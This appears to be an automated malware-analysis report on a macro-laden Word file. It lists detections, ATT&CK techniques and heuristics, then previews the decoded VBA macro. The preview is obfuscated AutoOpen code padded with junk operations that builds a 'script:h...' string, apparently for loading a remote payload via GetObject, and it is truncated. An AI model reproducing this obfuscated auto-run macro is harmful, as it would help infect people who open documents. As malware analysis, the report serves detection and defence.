MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file is identified as malicious by ClamAV and contains a VBA macro with an AutoOpen subroutine, a common technique for executing malicious code upon document opening. The presence of GetObject calls within the macro suggests an attempt to load and execute external code, likely a second-stage payload. No specific family could be identified due to obfuscation.
Heuristics 7
-
ClamAV: Doc.Malware.00536d-6923216-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.00536d-6923216-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45254 bytes |
SHA-256: 7f16728fa2fe7c7b9ce374316e06619d814aa8dfe89c8018833e505d99b05262 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub VISoqEpumiTuwusEGisi()
zOpOaiHipaq = InStr("hTIsErPOSuDo", "hTIsErPOSuDohTIsErPOSuDo")
Dim FyMEwEBywAmasUxUsIJAQera
Dim XOaaJIUbATARoxuxunoED
XOaaJIUbATARoxuxunoED = Log(6)
XOaaJIUbATARoxuxunoED = XOaaJIUbATARoxuxunoED + Log(11)
wuNAJAkELoHIt = InStr("liVaFOmhdOreaUdoBINoR", "liVaFOmhdOreaUdoBINoRliVaFOmhdOreaUdoBINoR")
FyMEwEBywAmasUxUsIJAQera = Log(7)
FyMEwEBywAmasUxUsIJAQera = FyMEwEBywAmasUxUsIJAQera + Log(12)
negymuFYTuqiVOniQO = Val("74482.10") & "maqoQiCYlibiCaGU"
End Sub
Sub AutoOpen()
On Error Resume Next
zEKEzekIgyaYgAGuGezoH = 19581
tYDEHoMyCIcyVaFuke = Val("83104.10") & "nefuKUdIBUFYRyTItMo"
pelIfUGyMYbAbomUZ = Val("57700.7") & "dESyjupeReRowuWowepAV"
Dim XOQydInaSoWyCuze
For XOQydInaSoWyCuze = 7 To 12
Dim RIjLuqUtIWUrIbIlop
RIjLuqUtIWUrIbIlop = Fix(6103)
Next
Dim SGIkolYTyMAbU
SGIkolYTyMAbU = Log(7)
SGIkolYTyMAbU = SGIkolYTyMAbU + Log(10)
Dim kEsISUlyrakADYbYbojYHiH
For kEsISUlyrakADYbYbojYHiH = 1 To 13
Dim SiNurIJIxexuDuWoVYLO
SiNurIJIxexuDuWoVYLO = Fix(52831)
Next
Dim HiPEJySqasaLUr
Debug.Print "cIsAjUhEvumel"
For HiPEJySqasaLUr = 2 To 11
ieqYniqilTiCofA = 75884
Dim NAgESAzYJoFUn
ayiYhixEqiFuZeTuDEaiJE = Val("71266.2") & "hERoBehOjiveRIPOMYLObUKI"
Dim xIvoXaJEMeBUnUfyFO
xIvoXaJEMeBUnUfyFO = Log(6)
xIvoXaJEMeBUnUfyFO = xIvoXaJEMeBUnUfyFO + Log(13)
NAgESAzYJoFUn = Fix(47842)
Next
fUsYxoqaVUwIRese = Val("62579.7") & "SehIPesalUpEiyS"
Dim CElAtaBIeZu
For CElAtaBIeZu = 2 To 12
Dim VoSYkCYrOcIDAaobI
VoSYkCYrOcIDAaobI = Fix(37334)
Next
GIitavujoTOKIKPiqEnif = ""
Dim bizygaPOVOXepUjAmoQAp
bizygaPOVOXepUjAmoQAp = Rnd(125)
If bizygaPOVOXepUjAmoQAp > 20639 Then
bizygaPOVOXepUjAmoQAp = Exp(5)
End If
Debug.Print "quxAnuSAgoNyzODuGn"
HUDewOCyvoPavOF = Val("6485.6") & "weGeqEgupOTonAzYciD"
CijezaMuMYSekyPARYJUa = InStr("vaBILYvizicedI", "vaBILYvizicedIvaBILYvizicedI")
Dim FybYCADUaYiiXeFYxUreb
For FybYCADUaYiiXeFYxUreb = 6 To 13
Dim jADyZupyjoOCY
jADyZupyjoOCY = Fix(19688)
Next
Debug.Print "fcyqJUGibuG"
Debug.Print "SePsOzYxEqIgoB"
GIitavujoTOKIKPiqEnif = GIitavujoTOKIKPiqEnif + IIf((235 + 470) = 705, "sc", "QmLC0")
Dim nIHoejIMimAhy
nIHoejIMimAhy = Log(8)
nIHoejIMimAhy = nIHoejIMimAhy + Log(13)
Dim RonufoWEFcOMuKy
RonufoWEFcOMuKy = Log(10)
RonufoWEFcOMuKy = RonufoWEFcOMuKy + Log(13)
qeWAtEmHYdYi = Val("9003.9") & "ieKeTinyauXyfIlEwIM"
LOseHWyMex = InStr("tyiASyVekADsEJUGAtiq", "tyiASyVekADsEJUGAtiqtyiASyVekADsEJUGAtiq")
GIitavujoTOKIKPiqEnif = GIitavujoTOKIKPiqEnif + IIf((149 + 298) = 447, "ri", "o")
PIjomUROladofipepyzo = Val("77980.10") & "LImHuieQC"
Dim tOJAPidOTOc
tOJAPidOTOc = Log(4)
tOJAPidOTOc = tOJAPidOTOc + Log(12)
gzAkYmAWYCYQe = 73246
Dim lFewIdikyaDEzuHAcAjai
fLyRyBAYiOTacUwUiYJa = InStr("WIBetIgYvEwETuhkAcEF", "WIBetIgYvEwETuhkAcEFWIBetIgYvEwETuhkAcEF")
buRgacigiXEfyKOqiH = 77217
For lFewIdikyaDEzuHAcAjai = 8 To 13
Dim xiTUGESIQowaUXiRYkEZy
xiTUGESIQowaUXiRYkEZy = Fix(39289)
Debug.Print "FEvYGutUBSEfUgInYbFAR"
kAZYQITuFiRiBYCuBemyWoM = Val("8066.1") & "XaLyTUNYCRyReJaqyD"
Next
GIitavujoTOKIKPiqEnif = GIitavujoTOKIKPiqEnif + IIf((170 + 340) = 510, "pt", "JfQEf")
Dim NeWPoWYvAcOhajYiOcafU
NeWPoWYvAcOhajYiOcafU = Log(8)
NeWPoWYvAcOhajYiOcafU = NeWPoWYvAcOhajYiOcafU + Log(12)
Dim mOLAqaWUiUTiWuZo
For mOLAqaWUiUTiWuZo = 8 To 12
Dim bohixozobICejAr
bohixozobICejAr = Fix(5042)
Next
NOZOZeFASOJaGuVvyGa = InStr("nYPyqoDyxIf", "nYPyqoDyxIfnYPyqoDyxIf")
GIitavujoTOKIKPiqEnif = GIitavujoTOKIKPiqEnif + IIf((193 + 386) = 579, ":h", "5t")
aatiLUiyioqupolYzoJD = 19844
qYsetIJDuiurE = 84682
Dim ZYxydotyqyMaFUQYCEzeDBY
ZYxydotyqyMaFUQYCEzeDBY = Rnd(124)
If ZYxydotyqyMaFUQYCEzeDBY > 84122 Then
ZYxydotyqyMaFUQYCEzeDBY = Exp(4)
End If
nYcEaygadizONuli
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.